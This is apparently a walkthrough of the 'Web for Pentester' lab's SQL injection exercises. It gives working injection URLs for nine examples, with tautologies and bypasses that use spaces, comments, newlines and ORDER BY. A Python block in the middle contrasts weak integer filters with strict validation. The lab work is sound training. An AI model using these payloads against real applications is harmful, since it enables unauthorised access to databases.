Web for Pentester -1 SQL Solutions

Example -1

Quote!

If we inject a single quote, using ?name=root', the table disappears. We probably broke something…

http://172.16.138.193/sqli/example1.php?name=root'%20or%20'1'='1


Example -2

ERROR SPACE

http://172.16.138.193/sqli/example2.php?name=root'or'1'='1


Example -3

Comments!

http://172.16.138.193/sqli/example3.php?name=root'/**/or/**/'1'='1


Example -4

Dot!

I add “.” at the beginning of the URL. Also, you can add “.” or “-” …etc.

http://172.16.138.193/sqli/example4.php?id=.2 or 1=1


Example – 5&6

Error Integer!

The “id=” parameter only accepts an integer, and it must start with a digit. If you supply a string, you get the error “Error Integer Required”. Similar to Example #4.

http://172.16.138.193/sqli/example5.php?id=2 or 1=1


http://172.16.138.193/sqli/example6.php?id=2 or 1=1


Example – 7

\n

You can bypass the filter by using “\n”.

http://172.16.138.193/sqli/example7.php?id=2%0A%20or%201=1
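
Examples 5 to 7 get through because the integer check only looks at part of the input. The following is an added example, not code from the original post or from the lab: the three weak patterns are assumed stand-ins for the filters (the page does not show the server code), and the sample values are the decoded id values from the URLs above, run through those checks and through a strict whole-string validator.

```python
import re

# Assumed stand-ins for the lab's filters; the page does not show the server code.
PREFIX_ONLY = re.compile(r"^[0-9]+")          # Example 5 behaviour: must start with a digit
SUFFIX_ONLY = re.compile(r"[0-9]+$")          # Example 6 behaviour: must end with a digit
MULTILINE = re.compile(r"^-?[0-9]+$", re.M)   # Example 7 behaviour: anchors apply per line


def weak_accepts(pattern, value):
    """Return True when the weak filter lets the value through."""
    return pattern.search(value) is not None


def strict_int(value, lo=1, hi=2**31 - 1):
    """Accept only a whole-string ASCII integer in range; return the int or None.

    fullmatch() avoids '$', which would also match before a trailing newline,
    and [0-9] avoids the non-ASCII digits that \\d accepts.
    """
    if not re.fullmatch(r"[0-9]{1,10}", value):
        return None
    n = int(value)
    return n if lo <= n <= hi else None


# Decoded id values taken from the URLs on this page.
SAMPLES = ["2", "2 or 1=1", "2\n or 1=1"]


def report():
    """Return (value, prefix_ok, suffix_ok, multiline_ok, strict_result) per sample."""
    return [
        (v,
         weak_accepts(PREFIX_ONLY, v),
         weak_accepts(SUFFIX_ONLY, v),
         weak_accepts(MULTILINE, v),
         strict_int(v))
        for v in SAMPLES
    ]


if __name__ == "__main__":
    for row in report():
        print(row)
```

Bind the integer returned by strict_int as a query parameter instead of concatenating it into the SQL string.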


Example -8

Order By!

Here, as you know, the query uses “order by”. Careful: type ` with (AltGr + ;)

http://172.16.138.193/sqli/example8.php?order=name`%20desc%20%23


Example -9

Without (`)

Similar to “Example -8” but no need to use (`)

http://172.16.138.193/sqli/example9.php?order=name%20asc%20%23
